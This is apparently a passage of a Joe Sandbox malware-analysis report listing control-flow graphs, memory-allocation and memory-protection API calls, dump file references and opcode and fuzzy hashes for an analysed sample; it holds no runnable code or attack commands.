                  • Instruction Fuzzy Hash: 2CD19076B105208F8B44EF6DD89892EB7E6EF8D71031545A8E90ADB3A1DF70DC01DBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1403 4df61f8-4df62c0 NtAllocateVirtualMemory 1408 4df62c9-4df62ee 1403->1408 1409 4df62c2-4df62c8 1403->1409 1409->1408
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04DF62B3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 792a1d36ba3e6c81b59dd5c6a16bb673018f5df0bea7af518e1ccfc7a7cb61d3
                  • Instruction ID: 15b27baba1082b424e20efc1b59ddb6fa16c303d9a7747dd4efb370fc3acb30f
                  • Opcode Fuzzy Hash: 792a1d36ba3e6c81b59dd5c6a16bb673018f5df0bea7af518e1ccfc7a7cb61d3
                  • Instruction Fuzzy Hash: FE317A719043899FDB11CFA9C890ADEBFF0FF49320F10846EE544AB252C774A915CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1413 4df5d49-4df5de6 NtProtectVirtualMemory 1417 4df5def-4df5e14 1413->1417 1418 4df5de8-4df5dee 1413->1418 1418->1417
                  APIs
                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04DF5DD9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 61f3e8441d17c7dae237965de02cbfc683891f46acb7acba31911a267301474c
                  • Instruction ID: 6ca1e00e6a4f8232919332b29046dd5f736e3aefe37b5b5571bee805560cb0df
                  • Opcode Fuzzy Hash: 61f3e8441d17c7dae237965de02cbfc683891f46acb7acba31911a267301474c
                  • Instruction Fuzzy Hash: 0421E2B1D013499FDB10CFAAD984ADEFBF5BF48310F20842AE519A7240D779A910CBA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1422 4df5d50-4df5de6 NtProtectVirtualMemory 1425 4df5def-4df5e14 1422->1425 1426 4df5de8-4df5dee 1422->1426 1426->1425
                  APIs
                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04DF5DD9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: e5428975b7489f539eed1580420fc41aa119309f30530aa2793aa9fd3a2e4f80
                  • Instruction ID: acec27a0d57b0cd29fc47d90f00264080c8c9f4bc3bf67a338e8db8285ccfcd3
                  • Opcode Fuzzy Hash: e5428975b7489f539eed1580420fc41aa119309f30530aa2793aa9fd3a2e4f80
                  • Instruction Fuzzy Hash: A021F2B1D013499FDB10CFAAD984ADEFBF5FF48310F20842AE519A7200C775A910CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1430 4df6230-4df62c0 NtAllocateVirtualMemory 1433 4df62c9-4df62ee 1430->1433 1434 4df62c2-4df62c8 1430->1434 1434->1433
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04DF62B3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: b3f8c32180870c840ba9d3d75931d8e0740f8cca6aaeea2d118afeb42e2ff0f5
                  • Instruction ID: 5967361e5ba1fac009ba831edb57770406670fddd8ab185b905f9755e461383a
                  • Opcode Fuzzy Hash: b3f8c32180870c840ba9d3d75931d8e0740f8cca6aaeea2d118afeb42e2ff0f5
                  • Instruction Fuzzy Hash: 8021E4B59003499FDB10DFAAC885ADEFBF5FF48320F10841AE519A7210C775A954CBA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1438 4df2df0-4df2e26 call 4df1d00 1442 4df2e2b-4df2e94 1438->1442 1447 4df2e96-4df2ec7 call 4df1d78 1442->1447 1451 4df2f0c-4df2f15 1447->1451 1452 4df2ec9-4df2ef8 1447->1452 1454 4df2f1b-4df2f6b 1451->1454 1455 4df31b7-4df31c6 call 4df1dc8 1451->1455 1453 4df2efb-4df2f06 1452->1453 1453->1451 1456 4df3091-4df30a8 1453->1456 1470 4df3014-4df3045 1454->1470 1471 4df2f71-4df2f93 1454->1471 1469 4df31c7 1455->1469 1459 4df30af-4df30bc 1456->1459 1460 4df30aa-4df30ad 1456->1460 1461 4df30be-4df30c9 1459->1461 1460->1461 1466 4df30cf-4df3114 1461->1466 1468 4df3137-4df314c 1466->1468 1475 4df314e-4df3154 1468->1475 1476 4df3116-4df3124 1468->1476 1469->1469 1488 4df304b-4df3057 1470->1488 1479 4df2ffa-4df300e 1471->1479 1480 4df2f95-4df2ff2 1471->1480 1475->1476 1481 4df3156-4df3169 1475->1481 1477 4df316b 1476->1477 1478 4df3126-4df3132 1476->1478 1483 4df3170 1477->1483 1478->1468 1479->1470 1480->1452 1493 4df2ff8 1480->1493 1481->1483 1483->1455 1488->1453 1490 4df305d-4df308b 1488->1490 1490->1451 1490->1456 1493->1488
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: 9R-l
                  • API String ID: 0-2809259381
                  • Opcode ID: 208674c127bf0fff5b3148b216fbcbe839b0c1e7fbdfa968e5406859cf6cb1a1
                  • Instruction ID: e19a607196016d8cf9365e9d9c875c1c983273990bc98d07d82f908ef4ae5bd3
                  • Opcode Fuzzy Hash: 208674c127bf0fff5b3148b216fbcbe839b0c1e7fbdfa968e5406859cf6cb1a1
                  • Instruction Fuzzy Hash: 8FB16C35B103098FCB14DFA9D884A9DBBF2BF88300B668169E915AB365DB71EC45CB40

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1494 fe9187-fe9195 1495 fe9197-fe91aa 1494->1495 1496 fe9171-fe917d 1494->1496 1497 fe91ac-fe9242 1495->1497 1503 fe9267-fe9284 1497->1503 1504 fe9244-fe9247 1497->1504 1506 fe928a-fe928e 1503->1506 1504->1503 1505 fe9249-fe925f 1504->1505 1505->1503 1508 fe9294-fe929f 1506->1508 1511 fe92a5-fe92d4 1508->1511 1512 fe9580-fe9587 1508->1512 1514 fe92da-fe92f8 1511->1514 1515 fe9535-fe954c 1511->1515 1512->1497 1513 fe9589-fe9593 1512->1513 1514->1511 1516 fe92fa-fe9333 1514->1516 1515->1511 1517 fe9552-fe9560 1515->1517 1516->1515 1518 fe9339-fe9378 1516->1518 1517->1512 1519 fe9562-fe9578 1517->1519 1518->1515 1520 fe937e-fe938c 1518->1520 1519->1512 1520->1511 1521 fe9392-fe9401 1520->1521 1521->1497 1527 fe9407-fe945d 1521->1527 1530 fe9502-fe9509 1527->1530 1530->1497 1531 fe950f-fe9528 1530->1531 1532 fe952e 1531->1532 1533 fe9462-fe94ad 1531->1533 1532->1515 1534 fe9594-fe95ad 1533->1534 1535 fe94b3-fe94d6 1533->1535 1534->1513 1538 fe95af-fe95cb 1534->1538 1535->1511 1536 fe94dc-fe94fb 1535->1536 1536->1530 1539 fe95d0-fe95dd 1538->1539 1540 fe95e3-fe95f4 1539->1540 1541 fe97c0-fe97d1 1539->1541 1542 fe95f7-fe960c 1540->1542 1541->1539 1543 fe97d7-fe97dd 1541->1543 1544 fe9612-fe961e 1542->1544 1545 fe9763-fe976a 1542->1545 1546 fe97e3-fe97ef 1543->1546 1548 fe9839-fe988b call fe8fe0 1544->1548 1549 fe9624-fe9669 1544->1549 1545->1542 1547 fe9770-fe978f 1545->1547 1546->1542 1550 fe97f5-fe9804 1546->1550 1547->1544 1553 fe9795 1547->1553 1554 fe966b-fe967f 1549->1554 1555 fe96b7-fe96bd 1549->1555 1551 fe980c-fe980f 1550->1551 1552 fe9806-fe9808 1550->1552 1557 fe9819 1551->1557 1558 fe9811-fe9818 1551->1558 1556 fe980a 1552->1556 1552->1557 1559 fe979b-fe97a7 1553->1559 1554->1540 1560 fe9685-fe9689 1554->1560 1555->1539 1562 fe96c3-fe96d4 1555->1562 1556->1558 1570 fe981e-fe9832 1557->1570 1559->1539 1565 fe97ad-fe97b1 1559->1565 1560->1559 1566 fe968f-fe96a6 1560->1566 1563 fe96d6-fe96f8 1562->1563 1564 fe9744-fe974a 1562->1564 1563->1564 1568 fe96fa-fe9736 1563->1568 1564->1539 1569 fe9750-fe975d 1564->1569 1565->1546 1571 fe97b3-fe97b9 1565->1571 1566->1539 1572 fe96ac-fe96b2 1566->1572 1568->1539 1573 fe973c-fe9742 1568->1573 1569->1545 1570->1548 1571->1570 1574 fe97bb 1571->1574 1572->1559 1573->1559
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: 1O^
                  • API String ID: 0-971112054
                  • Opcode ID: b9086d55abfde6d41993280c85ecb94fd4f7cd008f20f28ea90c2034f03acc5c
                  • Instruction ID: 248351298935ff4a83531c89c112c2fcd88ba0b90f474f8592b6be48d3b218d4
                  • Opcode Fuzzy Hash: b9086d55abfde6d41993280c85ecb94fd4f7cd008f20f28ea90c2034f03acc5c
                  • Instruction Fuzzy Hash: BDB12775E00248AFCB58DFAAD455AADB7F2FF89300B14C1AAD825E7350E7789A01CF10

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1581 4df2dec-4df2e26 call 4df1d00 1585 4df2e2b-4df2e94 1581->1585 1590 4df2e96-4df2ec7 call 4df1d78 1585->1590 1594 4df2f0c-4df2f15 1590->1594 1595 4df2ec9-4df2ef8 1590->1595 1597 4df2f1b-4df2f6b 1594->1597 1598 4df31b7-4df31c6 call 4df1dc8 1594->1598 1596 4df2efb-4df2f06 1595->1596 1596->1594 1599 4df3091-4df30a8 1596->1599 1613 4df3014-4df3045 1597->1613 1614 4df2f71-4df2f93 1597->1614 1612 4df31c7 1598->1612 1602 4df30af-4df30bc 1599->1602 1603 4df30aa-4df30ad 1599->1603 1604 4df30be-4df30c9 1602->1604 1603->1604 1609 4df30cf-4df3114 1604->1609 1611 4df3137-4df314c 1609->1611 1618 4df314e-4df3154 1611->1618 1619 4df3116-4df3124 1611->1619 1612->1612 1631 4df304b-4df3057 1613->1631 1622 4df2ffa-4df300e 1614->1622 1623 4df2f95-4df2ff2 1614->1623 1618->1619 1624 4df3156-4df3169 1618->1624 1620 4df316b 1619->1620 1621 4df3126-4df3132 1619->1621 1626 4df3170 1620->1626 1621->1611 1622->1613 1623->1595 1636 4df2ff8 1623->1636 1624->1626 1626->1598 1631->1596 1633 4df305d-4df308b 1631->1633 1633->1594 1633->1599 1636->1631
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: 9R-l
                  • API String ID: 0-2809259381
                  • Opcode ID: a63d495df09ca22d6fa33b7aa1917520eb5ceea5a96be54a5d234c0faa48963b
                  • Instruction ID: 07fda334eea523748d50c1c31f0cfc426e2b5569fe4d6aaa9249b19cf08a41ec
                  • Opcode Fuzzy Hash: a63d495df09ca22d6fa33b7aa1917520eb5ceea5a96be54a5d234c0faa48963b
                  • Instruction Fuzzy Hash: 36916D35F103098FCB14DFA9D88499DB7F2BF88300B26816AE915EB365EB71AC45CB50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1699 fec1a9-fec1c1 1701 fec1c3-fec1d0 call fea0a8 1699->1701 1704 fec1d5-fec215 call fe9a30 1701->1704 1709 fec218-fec248 call fe9a30 1704->1709 1712 fec24a-fec268 call fe9a30 1709->1712 1712->1704 1715 fec26e-fec28d 1712->1715 1715->1712 1717 fec28f-fec293 1715->1717 1718 fec295-fec29b 1717->1718 1719 fec2e1-fec2e7 1717->1719 1718->1709 1720 fec2a1-fec2c8 1718->1720 1719->1701 1721 fec2ed-fec2fc 1719->1721 1720->1719 1724 fec2ca-fec2db 1720->1724 1735 fec2ff call fec3d8 1721->1735 1736 fec2ff call fec480 1721->1736 1737 fec2ff call fec450 1721->1737 1723 fec305-fec335 1726 fec37a-fec380 1723->1726 1727 fec337-fec33d 1723->1727 1724->1719 1726->1709 1730 fec386-fec3ba 1726->1730 1727->1704 1729 fec343-fec374 1727->1729 1729->1726 1730->1719 1733 fec3c0-fec3c7 1730->1733 1735->1723 1736->1723 1737->1723
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: 3G.
                  • API String ID: 0-3978388015
                  • Opcode ID: abc8ba0b983c4ffe7aeeb9fddf643f0a35bdb4ec7b110a52a19d6bd521bd81cf
                  • Instruction ID: b24ef9210d9efecb455303ca5a09edf5fadfc069bedcbad13fa9c0a29f725863
                  • Opcode Fuzzy Hash: abc8ba0b983c4ffe7aeeb9fddf643f0a35bdb4ec7b110a52a19d6bd521bd81cf
                  • Instruction Fuzzy Hash: 5451C573E102248FCB18DF69C85456D77A2AF8976175641A9EC06FB361DA79CC02CBD0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1738 fec1b8-fec1c1 1739 fec1c3-fec1d0 call fea0a8 1738->1739 1742 fec1d5-fec215 call fe9a30 1739->1742 1747 fec218-fec248 call fe9a30 1742->1747 1750 fec24a-fec268 call fe9a30 1747->1750 1750->1742 1753 fec26e-fec28d 1750->1753 1753->1750 1755 fec28f-fec293 1753->1755 1756 fec295-fec29b 1755->1756 1757 fec2e1-fec2e7 1755->1757 1756->1747 1758 fec2a1-fec2c8 1756->1758 1757->1739 1759 fec2ed-fec2fc 1757->1759 1758->1757 1762 fec2ca-fec2db 1758->1762 1773 fec2ff call fec3d8 1759->1773 1774 fec2ff call fec480 1759->1774 1775 fec2ff call fec450 1759->1775 1761 fec305-fec335 1764 fec37a-fec380 1761->1764 1765 fec337-fec33d 1761->1765 1762->1757 1764->1747 1768 fec386-fec3ba 1764->1768 1765->1742 1767 fec343-fec374 1765->1767 1767->1764 1768->1757 1771 fec3c0-fec3c7 1768->1771 1773->1761 1774->1761 1775->1761
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: 3G.
                  • API String ID: 0-3978388015
                  • Opcode ID: f604c16d97fefb84b6b6325e772b08e14ab92c74c3e32286230dfd71ee473bf1
                  • Instruction ID: 4cd72b830d1da1d3215ea6c338ee0c26d5c925db86118e4f3ec2ea926b0627fd
                  • Opcode Fuzzy Hash: f604c16d97fefb84b6b6325e772b08e14ab92c74c3e32286230dfd71ee473bf1
                  • Instruction Fuzzy Hash: 6251E473F102248FCB18DFA9C89459D76E2AF8872175641A9EC06FB351DA79CC01CBD0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1776 4df76b0-4df76ce 1925 4df76d0 call 4df76a8 1776->1925 1926 4df76d0 call 4df76b0 1776->1926 1777 4df76d6-4df7708 1778 4df771a-4df7726 1777->1778 1779 4df770a 1777->1779 1780 4df772c-4df773b 1778->1780 1781 4df7c81-4df7cd6 1778->1781 1782 4df7c2b-4df7c34 1779->1782 1783 4df7710-4df7714 1779->1783 1792 4df7c47-4df7c5c 1780->1792 1793 4df7741 1780->1793 1812 4df7cd8-4df7cde 1781->1812 1784 4df7c36 1782->1784 1785 4df7c45 1782->1785 1783->1778 1783->1782 1787 4df7c3c-4df7c3f 1784->1787 1788 4df77d7-4df77eb 1784->1788 1789 4df7bd8-4df7c02 1785->1789 1787->1785 1787->1788 1788->1781 1791 4df77f1-4df7800 1788->1791 1800 4df796c-4df7975 1791->1800 1801 4df7806-4df7810 1791->1801 1813 4df7c64-4df7c79 1792->1813 1798 4df774a-4df7760 1793->1798 1798->1781 1809 4df7766-4df7772 1798->1809 1800->1781 1803 4df797b-4df798b 1800->1803 1805 4df7815-4df781b 1801->1805 1806 4df7812 1801->1806 1818 4df7aeb-4df7b18 1803->1818 1819 4df7991-4df799a 1803->1819 1805->1781 1810 4df7821-4df782d 1805->1810 1806->1805 1814 4df7774-4df777c 1809->1814 1815 4df782f-4df7842 1810->1815 1816 4df78a0-4df78cf 1810->1816 1820 4df7d30-4df7d36 1812->1820 1821 4df7ce0-4df7cec 1812->1821 1813->1781 1814->1781 1822 4df7782-4df779a 1814->1822 1823 4df7847-4df784d 1815->1823 1824 4df7844 1815->1824 1816->1781 1817 4df78d5-4df78de 1816->1817 1825 4df78e0-4df78e5 1817->1825 1838 4df7b1a-4df7b1f 1818->1838 1839 4df7b21 1818->1839 1819->1781 1826 4df79a0-4df79af 1819->1826 1829 4df7d3c-4df7d4c 1820->1829 1830 4df7e01-4df7e36 1820->1830 1827 4df7cef-4df7d01 1821->1827 1822->1814 1845 4df779c-4df77c6 1822->1845 1823->1781 1831 4df7853-4df7887 1823->1831 1824->1823 1825->1781 1832 4df78eb-4df7904 1825->1832 1850 4df7a59-4df7a62 1826->1850 1851 4df79b5-4df79c3 1826->1851 1827->1830 1833 4df7d07-4df7d1a 1827->1833 1829->1830 1836 4df7d52-4df7d62 1829->1836 1861 4df7e38-4df7e57 1830->1861 1831->1781 1837 4df788d-4df789e 1831->1837 1832->1825 1856 4df7906-4df7908 1832->1856 1833->1830 1843 4df7d20-4df7d2e 1833->1843 1836->1830 1840 4df7d68-4df7d78 1836->1840 1854 4df790e-4df7920 1837->1854 1846 4df7b26-4df7b37 1838->1846 1839->1846 1840->1830 1847 4df7d7e-4df7d8c 1840->1847 1843->1820 1843->1827 1845->1788 1859 4df77c8 1845->1859 1846->1781 1865 4df7b3d-4df7b4f 1846->1865 1847->1812 1853 4df7d92-4df7d9f 1847->1853 1850->1781 1857 4df7a68-4df7a77 1850->1857 1851->1781 1858 4df79c9-4df79d8 1851->1858 1870 4df7da2-4df7da8 1853->1870 1854->1781 1862 4df7926-4df7930 1854->1862 1856->1854 1874 4df7a7e-4df7a87 1857->1874 1875 4df7a79-4df7a7c 1857->1875 1876 4df79de-4df79e5 1858->1876 1877 4df7abb-4df7ad6 1858->1877 1859->1789 1863 4df77ce-4df77d1 1859->1863 1885 4df7e59-4df7e5d 1861->1885 1866 4df7938-4df793c 1862->1866 1867 4df7932 1862->1867 1863->1788 1863->1789 1889 4df7ba9 1865->1889 1890 4df7b51-4df7b6b 1865->1890 1872 4df793e-4df7943 1866->1872 1873 4df7945-4df7949 1866->1873 1867->1866 1870->1830 1883 4df7daa-4df7db8 1870->1883 1886 4df7955-4df7967 1872->1886 1878 4df794b-4df794f 1873->1878 1879 4df7951 1873->1879 1874->1781 1880 4df7a8d-4df7a9c 1874->1880 1887 4df7ab2-4df7ab8 1875->1887 1881 4df79ee 1876->1881 1882 4df79e7-4df79ec 1876->1882 1899 4df7adf 1877->1899 1900 4df7ad8-4df7add 1877->1900 1878->1886 1879->1886 1901 4df7a9e-4df7aa1 1880->1901 1902 4df7aa3-4df7aa9 1880->1902 1888 4df79f3-4df7a05 1881->1888 1882->1888 1883->1870 1906 4df7dba-4df7dbf 1883->1906 1886->1782 1887->1877 1894 4df7a0a-4df7a10 1888->1894 1895 4df7a07 1888->1895 1893 4df7bac-4df7bc1 1889->1893 1897 4df7b6d-4df7b82 1890->1897 1898 4df7b84-4df7ba7 1890->1898 1903 4df7bc9-4df7bcc 1893->1903 1904 4df7bc3 1893->1904 1894->1781 1905 4df7a16-4df7a2a 1894->1905 1895->1894 1897->1893 1898->1893 1907 4df7ae4-4df7ae6 1899->1907 1900->1907 1908 4df7aac-4df7aaf 1901->1908 1902->1908 1909 4df7bce-4df7bd2 1903->1909 1911 4df7c05-4df7c28 1903->1911 1904->1909 1910 4df7bc5-4df7bc7 1904->1910 1905->1781 1912 4df7a30-4df7a3a 1905->1912 1913 4df7dc2-4df7dc4 1906->1913 1907->1893 1908->1887 1909->1789 1909->1813 1910->1903 1910->1909 1911->1782 1916 4df7a3c 1912->1916 1917 4df7a42-4df7a54 1912->1917 1913->1830 1918 4df7dc6-4df7dd4 1913->1918 1916->1917 1917->1782 1918->1913 1920 4df7dd6-4df7dd9 1918->1920 1922 4df7de1-4df7dfe 1920->1922 1925->1777 1926->1777
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: acd6042e3b9b4ba53a47b204ed1bf523563a8dc575a0fd87ed6dad9f2b2faac3
                  • Instruction ID: cd31bf98d124686797520537716d22b515c7cf79f2c2e30d138efb5598f8eae5
                  • Opcode Fuzzy Hash: acd6042e3b9b4ba53a47b204ed1bf523563a8dc575a0fd87ed6dad9f2b2faac3
                  • Instruction Fuzzy Hash: 6C425B75A00605CFCB24CF58C9849AEBBF2FF88310B168A69D55A9B751D730F982CF90

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1927 fe9a30-fe9a65 1928 fe9a67-fe9a6a 1927->1928 1929 fe9a72-fe9a7e 1927->1929 1928->1929 1930 fe9aaa-fe9adc 1929->1930 1931 fe9a80-fe9aa9 1929->1931 1935 fe9ae1-fe9b15 call fe9a30 1930->1935 1938 fe9b1b-fe9b4c call fe8c38 1935->1938 1942 fe9b4e-fe9b69 1938->1942 1943 fe9b6f-fe9b99 1938->1943 1942->1943 1943->1938 1946 fe9b9b-fe9be5 1943->1946 1946->1942 1948 fe9beb-fe9c25 1946->1948 1951 fe9c2b-fe9c4c 1948->1951 1952 fe9db2-fe9dda call fe98a0 1948->1952 1951->1938 1956 fe9c52-fe9c7a 1951->1956 1952->1943 1957 fe9de0-fe9e0c 1952->1957 1956->1942 1958 fe9c80 1956->1958 1959 fe9e0e-fe9e1a 1957->1959 1960 fe9e5f-fe9eb8 call fe98a0 call fe1098 call fe8d68 1957->1960 1963 fe9d91-fe9da6 1958->1963 1959->1938 1961 fe9e20-fe9e24 1959->1961 1990 fe9ebd-fe9f23 1960->1990 1964 fe9e2a-fe9e4e 1961->1964 1965 fea032-fea046 1961->1965 1967 fe9dac 1963->1967 1968 fe9c85-fe9ca6 call fe9a30 1963->1968 1969 fea04d-fea0b3 1964->1969 1970 fe9e54-fe9e59 1964->1970 1965->1969 1967->1952 1982 fe9ca8-fe9cb4 1968->1982 1983 fe9ce2-fe9cf2 1968->1983 1977 fea0bb-fea15e 1969->1977 1978 fea0b6 call fe95b0 1969->1978 1970->1960 1970->1965 1978->1977 1982->1935 1985 fe9cba-fe9cdc 1982->1985 1983->1935 1986 fe9cf8-fe9d8e call fe98a0 1983->1986 1985->1983 1986->1963 1992 fe9f46-fe9f52 1990->1992 1994 fe9f54-fe9f63 1992->1994 1995 fe9f25-fe9f33 1992->1995 1994->1995 2002 fe9f65-fe9f78 1994->2002 1996 fe9f7a 1995->1996 1997 fe9f35-fe9f41 1995->1997 2000 fe9f7f-fe9f80 1996->2000 1997->1992 2000->1965 2002->2000
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5dc5eb765b2ab078397513f7306a8a3884f84de8be861569c8e7a4c542b80f75
                  • Instruction ID: 06e796b08d59cbf2a1cacb29ec45e328bfb068d10c8753c8a1f8af42c33f1149
                  • Opcode Fuzzy Hash: 5dc5eb765b2ab078397513f7306a8a3884f84de8be861569c8e7a4c542b80f75
                  • Instruction Fuzzy Hash: 2802E171B043558FCB14DF69D8D069EBBF2BF89300B5581AAE409DB362DBB4AC46CB50
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 31132ef41afde3de9763a6dd72b43de0ebaa43da91cb164a1f2362ba5f9e3e6d
                  • Instruction ID: bdde3a3228fdb3883d4fb0347f0ff71d5d304016a41753816fef523d23906c02
                  • Opcode Fuzzy Hash: 31132ef41afde3de9763a6dd72b43de0ebaa43da91cb164a1f2362ba5f9e3e6d
                  • Instruction Fuzzy Hash: 0DA13873E002698BCB10CF99C8845AEB7F2AB54320B1A8566DC15FB351D774EC41DBE1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9c8d3f8d26de7a034f18f29a88b8f734d5690df0d2a4cf8a7e85be14a354e7e
                  • Instruction ID: 91937728decc63b5ecc97edd19b1524b26c432a08d2347fb8ab921f69c9a63ae
                  • Opcode Fuzzy Hash: d9c8d3f8d26de7a034f18f29a88b8f734d5690df0d2a4cf8a7e85be14a354e7e
                  • Instruction Fuzzy Hash: 2E91DD72F043498FCB54DEAADCC069DB7A2BF98300F548169E109EB351EFB0AC859B50
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fa4b7d6de13066425094cd948c45c884e34ac209f02f46dc189c5d1f57b134a3
                  • Instruction ID: 71d5568c0d0366d5330a20ceedd645dc05f6937b4590c0a83880340fb4e7dd8a
                  • Opcode Fuzzy Hash: fa4b7d6de13066425094cd948c45c884e34ac209f02f46dc189c5d1f57b134a3
                  • Instruction Fuzzy Hash: AA512833F152684FC715CABDDC904997BE29F8626070B41BBD849EB7A2D574CC0AC790
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 448ca18f316e7326e1938b8947d5236117d30414587db87ee27b848b2f1d5482
                  • Instruction ID: 42d009a9139659231fcab77625789b40e8c5185dfd5e58f1a83a959121148ebe
                  • Opcode Fuzzy Hash: 448ca18f316e7326e1938b8947d5236117d30414587db87ee27b848b2f1d5482
                  • Instruction Fuzzy Hash: 8B512632F002658FD714DF7ED84445AB7F6AF9926070A41ABEC09EB366DA309C06CBD0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69f7ec0ca25afc91ae7193fd095cb980c176dceab9305b85b710e51fa7b3e09a
                  • Instruction ID: 7345a418b2c178649f2721b31e8c8ad4dfac843b9a13acadc2bef40d65036988
                  • Opcode Fuzzy Hash: 69f7ec0ca25afc91ae7193fd095cb980c176dceab9305b85b710e51fa7b3e09a
                  • Instruction Fuzzy Hash: A0312877F106394F8714CEADDC945AAB6E2AB8426070A817ADC46EB751D5B4CC09C7D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
